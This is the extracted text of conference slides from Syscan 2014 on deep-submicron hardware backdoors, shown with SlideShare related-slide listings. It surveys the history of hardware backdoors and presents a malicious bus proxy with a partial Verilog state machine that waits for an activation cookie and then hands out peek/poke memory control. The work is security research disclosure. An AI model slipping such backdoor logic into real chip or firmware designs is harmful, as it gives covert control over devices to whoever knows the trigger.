SlideShare ist ein Scribd-Unternehmen logo
1 von 31
Downloaden Sie, um offline zu lesen
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Deep-Submicron Backdoor 
Syscan Singapore 2014 
Alfredo Ortega 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Agenda 
Deep-Submicron VLSI: Technology smaller than 350nm 
Hardware Backdoors History 
Non-Gov examples 
Unintentional backdoors 
Why create a CPU backdoor 
Malproxy BUS backdoor (Demo) 
RFI Ex
ltration backdoor (Demo) 
Questions 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Introduction 
Hardware": overused 
Not Hardware: 
Regular user-mode backdoors - Re
ections 
on Trusting Trust" 
Weakening of protocols/cryptography (See 
RSA Dual EC DRBG saga) 
Very practical 
Particularly dangerous 
Easy to catch 
Software 
User−mode 
Kernel−mode 
Hypervisor 
Firmware 
Microcode 
Physics 
Regular Rootkits 
Hardware 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Hardware" backdoors? 
Still in software/
rmware 
Specially dangerous if massive (adversary can 
use them) 
More expensive to detect (No AVs) 
Software 
User−mode 
Kernel−mode 
Hypervisor 
Firmware 
Microcode 
Physics 
Regular Rootkits 
Bios Rootkits 
SMM Rootkits 
AMT Rootkits 
Hardware Our talk 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
History 
The Great Seal Bug 
Also called The Thing" 
one of the
rst covert 
listening devices (Found in 
1945) 
Designed by Leon Theremin 
Sound-modulated resonant 
cavity: No external power. 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Clipper chip 
Clipper chip 
Developed and promoted by 
the U.S. NSA 
Announced in 1993 
Skipjack algorithm - Key 
escrow mechanism 
Cryptographer Matt Blaze 
published a serious 
vulnerability. 
Entirely defunct by 1996 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
NSA Ant division Catalog 
NSA ANT Insert catalog 
Catalog of hardware 
backdoors 
Developed from 2005 to 2010 
Leaked by Edward Snowden 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Non-gov examples (Legit backdoors) 
Intel Anti-theft tech 
Network equipment lawful interception 
Research and Academia: 
IEEE Hardware-Oriented Security 
and Trust (HOST) 
NYU-Poly Embedded-System 
Challenge 
Too many to cite. Very advanced. 
Stealthy Dopant-Level Hardware Trojans 
Becker Et. Al. 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Unintentional backdoors 
World-accesible re
ashing mechanisms 
(BIOS,micro-sd, pendrives, etc.) 
Most
rmware-backdoors 
Silicon-PROASIC3 backdoor 
(Skorobogatov Et. Al.) 
JTAG-interfaces 
Convenience/Security tradeo 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Rationale 
No real backdoor on silicon to analyze, 
all theoretical examples. 
Let's make a real one. Our approach: 
Real silicon ASIC design 
Generic and simple payload 
trivial to locate. No eort on stealth. 
Ready for massive deployment 
Two basic attacks: 
1 Bus-intrusion (MALPROXY) 
2 data-ex
ltration (RiFt) 
R i Ft 
MAL PROXY 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Introduction 
High-level design 
Logic 
ASIC 
Usage 
MALPROXY 
3 
4 
7 
1 
2 
13 
12 
11 
10 
9 
15 
Malicious Bus Proxy 
RAM 
BUS 
CPU 
5 
6 
14 
MALPROXY Bus backdoor 
Small malicious state-machine 
Peek/Poke functionality 
AMBA-compatible 
CPU/Software independent 
Real system (ARM Cortex-M0 
DesignStart) 
FPGA and silicon-ready 
Easy to detect 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Introduction 
High-level design 
Logic 
ASIC 
Usage 
MALPROXY 
High-level Design 
Constantly monitoring the AMBA bus. 
If command correctly parsed, take 
control of the bus and modify memory. 
Only two commands needed for 
execution control: 
Peek mem32 
Poke mem32 
If software/arch is known, only Poke 
command is enough. 
Search activation 
cookie 
Read command 
Read address 
Read data 
Execute command 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Introduction 
High-level design 
Logic 
ASIC 
Usage 
MALPROXY: Verilog 
1 // ------------------------------------------------- 
2 // Trivial rootkit coprocessor unit 
3 // ------------------------------------------------- 
4 reg [5:0] RTKState ; 
5 reg [8:0] RTKCmd ; 
6 
7 reg [3:0] RTKCount ; 
8 `define RTK_FIND_START 5'h0 
9 `define RTK_FIND_CMD 5'h1 
10 `define RTK_FIND_DATA 5'h2 
11 `define RTK_FIND_ADDR 5'h3 
12 `define RTK_EXEC 5'h4 
13 `define RTK_EXEC2 5'h5 
14 `define RTK_END 5'h6 
15 `define RTK_CMD_WRITE W 
16 `define RTK_CMD_READ R 
17 
18 // 56 - bit initial cookie 
19 // I.E. memcpy  x78  x56  x34  x12R  xaa  x55  xaa ; 
20 `define RTK_COOKIE_1 32' h12345678 
21 `define RTK_COOKIE_2 24' h434241 
22 `define RTK_COOKIE_3 24' h2D2D2D // --- 
1 always @( posedge HCLK or posedge HRESETn ) 
2 begin 
3 if (! HRESETn ) // Reset 
4 begin 
5 RTKState = `RTK_FIND_START ; 
6 RTKDeviated =0; 
7 end 
8 else begin 
9 case ( RTKState ) 
10 `RTK_FIND_START : // Find first part of cookie 
11 if ( HWDATA == `RTK_COOKIE_1 ) 
12 begin 
13 RTKState = `RTK_FIND_CMD ; 
14 end 
15 `RTK_FIND_CMD : // Load second part of cookie and 
16 begin // single - byte command 
17 if ( HWDATA [31:8] == `RTK_COOKIE_2 ) 
18 begin 
19 RTKCmd = HWDATA [7:0]; 
20 RTKState = `RTK_FIND_DATA ; 
21 RTKCount =0; 
22 end 
23 else RTKState = `RTK_FIND_START ; 
24 end 
Groundworks Technologies Deep-Submicron Backdoor

Weitere ähnliche Inhalte

Was ist angesagt?

1300 david oswald id and ip theft with side-channel attacks
1300 david oswald   id and ip theft with side-channel attacks1300 david oswald   id and ip theft with side-channel attacks
1300 david oswald id and ip theft with side-channel attacksPositive Hack Days
 
A meta model supporting both hardware and smalltalk-based execution of FPGA c...
A meta model supporting both hardware and smalltalk-based execution of FPGA c...A meta model supporting both hardware and smalltalk-based execution of FPGA c...
A meta model supporting both hardware and smalltalk-based execution of FPGA c...ESUG
 
Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017Andriy Berestovskyy
 
A Hypervisor IPS based on Hardware Assisted Virtualization Technology
A Hypervisor IPS based on Hardware Assisted Virtualization TechnologyA Hypervisor IPS based on Hardware Assisted Virtualization Technology
A Hypervisor IPS based on Hardware Assisted Virtualization TechnologyFFRI, Inc.
 
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald..."Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...PROIDEA
 
Appearances are deceiving: Novel offensive techniques in Windows 10/11 on ARM
Appearances are deceiving: Novel offensive techniques in Windows 10/11 on ARMAppearances are deceiving: Novel offensive techniques in Windows 10/11 on ARM
Appearances are deceiving: Novel offensive techniques in Windows 10/11 on ARMFFRI, Inc.
 
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Maksim Shudrak
 
Message Signaled Interrupts
Message Signaled InterruptsMessage Signaled Interrupts
Message Signaled InterruptsAnshuman Biswal
 
VHDL Practical Exam Guide
VHDL Practical Exam GuideVHDL Practical Exam Guide
VHDL Practical Exam GuideEslam Mohammed
 
Kaspersky SAS SCADA in the Cloud
Kaspersky SAS SCADA in the CloudKaspersky SAS SCADA in the Cloud
Kaspersky SAS SCADA in the Cloudqqlan
 
Silicon scanners cambridge report
Silicon scanners cambridge reportSilicon scanners cambridge report
Silicon scanners cambridge reportLiberteks
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Maksim Shudrak
 
Polyteda: Power DRC/LVS, October 2016
Polyteda: Power DRC/LVS, October 2016Polyteda: Power DRC/LVS, October 2016
Polyteda: Power DRC/LVS, October 2016Oleksandra Nazola
 
Stm32 f4 first touch
Stm32 f4 first touchStm32 f4 first touch
Stm32 f4 first touchBenux Wei
 
Ipv6 test plan for opnfv poc v2.2 spirent-vctlab
Ipv6 test plan for opnfv poc v2.2 spirent-vctlabIpv6 test plan for opnfv poc v2.2 spirent-vctlab
Ipv6 test plan for opnfv poc v2.2 spirent-vctlabIben Rodriguez
 
Developing micro controller applications
Developing micro controller applicationsDeveloping micro controller applications
Developing micro controller applicationsSteve Mylroie
 

Was ist angesagt? (20)

1300 david oswald id and ip theft with side-channel attacks
1300 david oswald   id and ip theft with side-channel attacks1300 david oswald   id and ip theft with side-channel attacks
1300 david oswald id and ip theft with side-channel attacks
 
A meta model supporting both hardware and smalltalk-based execution of FPGA c...
A meta model supporting both hardware and smalltalk-based execution of FPGA c...A meta model supporting both hardware and smalltalk-based execution of FPGA c...
A meta model supporting both hardware and smalltalk-based execution of FPGA c...
 
20141105 asfws-norx-slides
20141105 asfws-norx-slides20141105 asfws-norx-slides
20141105 asfws-norx-slides
 
Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017
 
Hardware Trojans
Hardware TrojansHardware Trojans
Hardware Trojans
 
A Hypervisor IPS based on Hardware Assisted Virtualization Technology
A Hypervisor IPS based on Hardware Assisted Virtualization TechnologyA Hypervisor IPS based on Hardware Assisted Virtualization Technology
A Hypervisor IPS based on Hardware Assisted Virtualization Technology
 
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald..."Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
 
Appearances are deceiving: Novel offensive techniques in Windows 10/11 on ARM
Appearances are deceiving: Novel offensive techniques in Windows 10/11 on ARMAppearances are deceiving: Novel offensive techniques in Windows 10/11 on ARM
Appearances are deceiving: Novel offensive techniques in Windows 10/11 on ARM
 
PROFIBUS frame analysis - Peter Thomas of Control Specialists
PROFIBUS frame analysis - Peter Thomas of Control SpecialistsPROFIBUS frame analysis - Peter Thomas of Control Specialists
PROFIBUS frame analysis - Peter Thomas of Control Specialists
 
presentation_DRDO
presentation_DRDOpresentation_DRDO
presentation_DRDO
 
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
 
Message Signaled Interrupts
Message Signaled InterruptsMessage Signaled Interrupts
Message Signaled Interrupts
 
VHDL Practical Exam Guide
VHDL Practical Exam GuideVHDL Practical Exam Guide
VHDL Practical Exam Guide
 
Kaspersky SAS SCADA in the Cloud
Kaspersky SAS SCADA in the CloudKaspersky SAS SCADA in the Cloud
Kaspersky SAS SCADA in the Cloud
 
Silicon scanners cambridge report
Silicon scanners cambridge reportSilicon scanners cambridge report
Silicon scanners cambridge report
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
 
Polyteda: Power DRC/LVS, October 2016
Polyteda: Power DRC/LVS, October 2016Polyteda: Power DRC/LVS, October 2016
Polyteda: Power DRC/LVS, October 2016
 
Stm32 f4 first touch
Stm32 f4 first touchStm32 f4 first touch
Stm32 f4 first touch
 
Ipv6 test plan for opnfv poc v2.2 spirent-vctlab
Ipv6 test plan for opnfv poc v2.2 spirent-vctlabIpv6 test plan for opnfv poc v2.2 spirent-vctlab
Ipv6 test plan for opnfv poc v2.2 spirent-vctlab
 
Developing micro controller applications
Developing micro controller applicationsDeveloping micro controller applications
Developing micro controller applications
 

Ähnlich wie Deep submicron-backdoors-ortega-syscan-2014-slides

ARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopSaumil Shah
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020Jose Palanco
 
POLYTEDA PowerDRC/LVS overview
POLYTEDA PowerDRC/LVS overviewPOLYTEDA PowerDRC/LVS overview
POLYTEDA PowerDRC/LVS overviewAlexander Grudanov
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Using VPP and SRIO-V with Clear Containers
Using VPP and SRIO-V with Clear ContainersUsing VPP and SRIO-V with Clear Containers
Using VPP and SRIO-V with Clear ContainersMichelle Holley
 
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation WorkshopHack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation WorkshopSaumil Shah
 
26.1.7 lab snort and firewall rules
26.1.7 lab   snort and firewall rules26.1.7 lab   snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptxssuserfcf43f
 
PowerDRC/LVS 2.2 released by POLYTEDA
PowerDRC/LVS 2.2 released by POLYTEDAPowerDRC/LVS 2.2 released by POLYTEDA
PowerDRC/LVS 2.2 released by POLYTEDAAlexander Grudanov
 
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015CODE BLUE
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяEkaterina Melnik
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NamePositive Hack Days
 
IoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoIoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoCodemotion
 
IoT exploitation: from memory corruption to code execution - Marco Romano - C...
IoT exploitation: from memory corruption to code execution - Marco Romano - C...IoT exploitation: from memory corruption to code execution - Marco Romano - C...
IoT exploitation: from memory corruption to code execution - Marco Romano - C...Codemotion
 
POLYTEDA: Power DRC/LVS, June 2017
POLYTEDA: Power DRC/LVS, June 2017POLYTEDA: Power DRC/LVS, June 2017
POLYTEDA: Power DRC/LVS, June 2017Oleksandra Nazola
 
2017 - LISA - LinkedIn's Distributed Firewall (DFW)
2017 - LISA - LinkedIn's Distributed Firewall (DFW)2017 - LISA - LinkedIn's Distributed Firewall (DFW)
2017 - LISA - LinkedIn's Distributed Firewall (DFW)Mike Svoboda
 
PowerDRC/LVS 2.0.1 released by POLYTEDA
PowerDRC/LVS 2.0.1 released by POLYTEDAPowerDRC/LVS 2.0.1 released by POLYTEDA
PowerDRC/LVS 2.0.1 released by POLYTEDAAlexander Grudanov
 
BRKRST-3068 Troubleshooting Catalyst 2K and 3K.pdf
BRKRST-3068  Troubleshooting Catalyst 2K and 3K.pdfBRKRST-3068  Troubleshooting Catalyst 2K and 3K.pdf
BRKRST-3068 Troubleshooting Catalyst 2K and 3K.pdfssusercbaa33
 
Scada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsScada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsAleksandr Timorin
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey GordeychikCODE BLUE
 

Ähnlich wie Deep submicron-backdoors-ortega-syscan-2014-slides (20)

ARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation Workshop
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
 
POLYTEDA PowerDRC/LVS overview
POLYTEDA PowerDRC/LVS overviewPOLYTEDA PowerDRC/LVS overview
POLYTEDA PowerDRC/LVS overview
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Using VPP and SRIO-V with Clear Containers
Using VPP and SRIO-V with Clear ContainersUsing VPP and SRIO-V with Clear Containers
Using VPP and SRIO-V with Clear Containers
 
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation WorkshopHack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
 
26.1.7 lab snort and firewall rules
26.1.7 lab   snort and firewall rules26.1.7 lab   snort and firewall rules
26.1.7 lab snort and firewall rules
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptx
 
PowerDRC/LVS 2.2 released by POLYTEDA
PowerDRC/LVS 2.2 released by POLYTEDAPowerDRC/LVS 2.2 released by POLYTEDA
PowerDRC/LVS 2.2 released by POLYTEDA
 
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имя
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the Name
 
IoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoIoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco Romano
 
IoT exploitation: from memory corruption to code execution - Marco Romano - C...
IoT exploitation: from memory corruption to code execution - Marco Romano - C...IoT exploitation: from memory corruption to code execution - Marco Romano - C...
IoT exploitation: from memory corruption to code execution - Marco Romano - C...
 
POLYTEDA: Power DRC/LVS, June 2017
POLYTEDA: Power DRC/LVS, June 2017POLYTEDA: Power DRC/LVS, June 2017
POLYTEDA: Power DRC/LVS, June 2017
 
2017 - LISA - LinkedIn's Distributed Firewall (DFW)
2017 - LISA - LinkedIn's Distributed Firewall (DFW)2017 - LISA - LinkedIn's Distributed Firewall (DFW)
2017 - LISA - LinkedIn's Distributed Firewall (DFW)
 
PowerDRC/LVS 2.0.1 released by POLYTEDA
PowerDRC/LVS 2.0.1 released by POLYTEDAPowerDRC/LVS 2.0.1 released by POLYTEDA
PowerDRC/LVS 2.0.1 released by POLYTEDA
 
BRKRST-3068 Troubleshooting Catalyst 2K and 3K.pdf
BRKRST-3068  Troubleshooting Catalyst 2K and 3K.pdfBRKRST-3068  Troubleshooting Catalyst 2K and 3K.pdf
BRKRST-3068 Troubleshooting Catalyst 2K and 3K.pdf
 
Scada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsScada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanisms
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
 

Kürzlich hochgeladen

User Guide: Pulsar™ Weather Station (Columbia Weather Systems)
User Guide: Pulsar™ Weather Station (Columbia Weather Systems)User Guide: Pulsar™ Weather Station (Columbia Weather Systems)
User Guide: Pulsar™ Weather Station (Columbia Weather Systems)Columbia Weather Systems
 
PROJECTILE MOTION-Horizontal and Vertical
PROJECTILE MOTION-Horizontal and VerticalPROJECTILE MOTION-Horizontal and Vertical
PROJECTILE MOTION-Horizontal and VerticalMAESTRELLAMesa2
 
FREE NURSING BUNDLE FOR NURSES.PDF by na
FREE NURSING BUNDLE FOR NURSES.PDF by naFREE NURSING BUNDLE FOR NURSES.PDF by na
FREE NURSING BUNDLE FOR NURSES.PDF by naJASISJULIANOELYNV
 
Topic 9- General Principles of International Law.pptx
Topic 9- General Principles of International Law.pptxTopic 9- General Principles of International Law.pptx
Topic 9- General Principles of International Law.pptxJorenAcuavera1
 
Pests of Blackgram, greengram, cowpea_Dr.UPR.pdf
Pests of Blackgram, greengram, cowpea_Dr.UPR.pdfPests of Blackgram, greengram, cowpea_Dr.UPR.pdf
Pests of Blackgram, greengram, cowpea_Dr.UPR.pdfPirithiRaju
 
Speech, hearing, noise, intelligibility.pptx
Speech, hearing, noise, intelligibility.pptxSpeech, hearing, noise, intelligibility.pptx
Speech, hearing, noise, intelligibility.pptxpriyankatabhane
 
Thermodynamics ,types of system,formulae ,gibbs free energy .pptx
Thermodynamics ,types of system,formulae ,gibbs free energy .pptxThermodynamics ,types of system,formulae ,gibbs free energy .pptx
Thermodynamics ,types of system,formulae ,gibbs free energy .pptxuniversity
 
Microteaching on terms used in filtration .Pharmaceutical Engineering
Microteaching on terms used in filtration .Pharmaceutical EngineeringMicroteaching on terms used in filtration .Pharmaceutical Engineering
Microteaching on terms used in filtration .Pharmaceutical EngineeringPrajakta Shinde
 
CHROMATOGRAPHY PALLAVI RAWAT.pptx
CHROMATOGRAPHY  PALLAVI RAWAT.pptxCHROMATOGRAPHY  PALLAVI RAWAT.pptx
CHROMATOGRAPHY PALLAVI RAWAT.pptxpallavirawat456
 
Manassas R - Parkside Middle School 🌎🏫
Manassas R - Parkside Middle School 🌎🏫Manassas R - Parkside Middle School 🌎🏫
Manassas R - Parkside Middle School 🌎🏫qfactory1
 
OECD bibliometric indicators: Selected highlights, April 2024
OECD bibliometric indicators: Selected highlights, April 2024OECD bibliometric indicators: Selected highlights, April 2024
OECD bibliometric indicators: Selected highlights, April 2024innovationoecd
 
Base editing, prime editing, Cas13 & RNA editing and organelle base editing
Base editing, prime editing, Cas13 & RNA editing and organelle base editingBase editing, prime editing, Cas13 & RNA editing and organelle base editing
Base editing, prime editing, Cas13 & RNA editing and organelle base editingNetHelix
 
GLYCOSIDES Classification Of GLYCOSIDES Chemical Tests Glycosides
GLYCOSIDES Classification Of GLYCOSIDES  Chemical Tests GlycosidesGLYCOSIDES Classification Of GLYCOSIDES  Chemical Tests Glycosides
GLYCOSIDES Classification Of GLYCOSIDES Chemical Tests GlycosidesNandakishor Bhaurao Deshmukh
 
User Guide: Capricorn FLX™ Weather Station
User Guide: Capricorn FLX™ Weather StationUser Guide: Capricorn FLX™ Weather Station
User Guide: Capricorn FLX™ Weather StationColumbia Weather Systems
 
REVISTA DE BIOLOGIA E CIÊNCIAS DA TERRA ISSN 1519-5228 - Artigo_Bioterra_V24_...
REVISTA DE BIOLOGIA E CIÊNCIAS DA TERRA ISSN 1519-5228 - Artigo_Bioterra_V24_...REVISTA DE BIOLOGIA E CIÊNCIAS DA TERRA ISSN 1519-5228 - Artigo_Bioterra_V24_...
REVISTA DE BIOLOGIA E CIÊNCIAS DA TERRA ISSN 1519-5228 - Artigo_Bioterra_V24_...Universidade Federal de Sergipe - UFS
 
Introduction of Human Body & Structure of cell.pptx
Introduction of Human Body & Structure of cell.pptxIntroduction of Human Body & Structure of cell.pptx
Introduction of Human Body & Structure of cell.pptxMedical College
 
Vision and reflection on Mining Software Repositories research in 2024
Vision and reflection on Mining Software Repositories research in 2024Vision and reflection on Mining Software Repositories research in 2024
Vision and reflection on Mining Software Repositories research in 2024AyushiRastogi48
 
Davis plaque method.pptx recombinant DNA technology
Davis plaque method.pptx recombinant DNA technologyDavis plaque method.pptx recombinant DNA technology
Davis plaque method.pptx recombinant DNA technologycaarthichand2003
 
Citronella presentation SlideShare mani upadhyay
Citronella presentation SlideShare mani upadhyayCitronella presentation SlideShare mani upadhyay
Citronella presentation SlideShare mani upadhyayupadhyaymani499
 

Kürzlich hochgeladen (20)

User Guide: Pulsar™ Weather Station (Columbia Weather Systems)
User Guide: Pulsar™ Weather Station (Columbia Weather Systems)User Guide: Pulsar™ Weather Station (Columbia Weather Systems)
User Guide: Pulsar™ Weather Station (Columbia Weather Systems)
 
PROJECTILE MOTION-Horizontal and Vertical
PROJECTILE MOTION-Horizontal and VerticalPROJECTILE MOTION-Horizontal and Vertical
PROJECTILE MOTION-Horizontal and Vertical
 
FREE NURSING BUNDLE FOR NURSES.PDF by na
FREE NURSING BUNDLE FOR NURSES.PDF by naFREE NURSING BUNDLE FOR NURSES.PDF by na
FREE NURSING BUNDLE FOR NURSES.PDF by na
 
Topic 9- General Principles of International Law.pptx
Topic 9- General Principles of International Law.pptxTopic 9- General Principles of International Law.pptx
Topic 9- General Principles of International Law.pptx
 
Pests of Blackgram, greengram, cowpea_Dr.UPR.pdf
Pests of Blackgram, greengram, cowpea_Dr.UPR.pdfPests of Blackgram, greengram, cowpea_Dr.UPR.pdf
Pests of Blackgram, greengram, cowpea_Dr.UPR.pdf
 
Speech, hearing, noise, intelligibility.pptx
Speech, hearing, noise, intelligibility.pptxSpeech, hearing, noise, intelligibility.pptx
Speech, hearing, noise, intelligibility.pptx
 
Thermodynamics ,types of system,formulae ,gibbs free energy .pptx
Thermodynamics ,types of system,formulae ,gibbs free energy .pptxThermodynamics ,types of system,formulae ,gibbs free energy .pptx
Thermodynamics ,types of system,formulae ,gibbs free energy .pptx
 
Microteaching on terms used in filtration .Pharmaceutical Engineering
Microteaching on terms used in filtration .Pharmaceutical EngineeringMicroteaching on terms used in filtration .Pharmaceutical Engineering
Microteaching on terms used in filtration .Pharmaceutical Engineering
 
CHROMATOGRAPHY PALLAVI RAWAT.pptx
CHROMATOGRAPHY  PALLAVI RAWAT.pptxCHROMATOGRAPHY  PALLAVI RAWAT.pptx
CHROMATOGRAPHY PALLAVI RAWAT.pptx
 
Manassas R - Parkside Middle School 🌎🏫
Manassas R - Parkside Middle School 🌎🏫Manassas R - Parkside Middle School 🌎🏫
Manassas R - Parkside Middle School 🌎🏫
 
OECD bibliometric indicators: Selected highlights, April 2024
OECD bibliometric indicators: Selected highlights, April 2024OECD bibliometric indicators: Selected highlights, April 2024
OECD bibliometric indicators: Selected highlights, April 2024
 
Base editing, prime editing, Cas13 & RNA editing and organelle base editing
Base editing, prime editing, Cas13 & RNA editing and organelle base editingBase editing, prime editing, Cas13 & RNA editing and organelle base editing
Base editing, prime editing, Cas13 & RNA editing and organelle base editing
 
GLYCOSIDES Classification Of GLYCOSIDES Chemical Tests Glycosides
GLYCOSIDES Classification Of GLYCOSIDES  Chemical Tests GlycosidesGLYCOSIDES Classification Of GLYCOSIDES  Chemical Tests Glycosides
GLYCOSIDES Classification Of GLYCOSIDES Chemical Tests Glycosides
 
User Guide: Capricorn FLX™ Weather Station
User Guide: Capricorn FLX™ Weather StationUser Guide: Capricorn FLX™ Weather Station
User Guide: Capricorn FLX™ Weather Station
 
REVISTA DE BIOLOGIA E CIÊNCIAS DA TERRA ISSN 1519-5228 - Artigo_Bioterra_V24_...
REVISTA DE BIOLOGIA E CIÊNCIAS DA TERRA ISSN 1519-5228 - Artigo_Bioterra_V24_...REVISTA DE BIOLOGIA E CIÊNCIAS DA TERRA ISSN 1519-5228 - Artigo_Bioterra_V24_...
REVISTA DE BIOLOGIA E CIÊNCIAS DA TERRA ISSN 1519-5228 - Artigo_Bioterra_V24_...
 
Introduction of Human Body & Structure of cell.pptx
Introduction of Human Body & Structure of cell.pptxIntroduction of Human Body & Structure of cell.pptx
Introduction of Human Body & Structure of cell.pptx
 
Vision and reflection on Mining Software Repositories research in 2024
Vision and reflection on Mining Software Repositories research in 2024Vision and reflection on Mining Software Repositories research in 2024
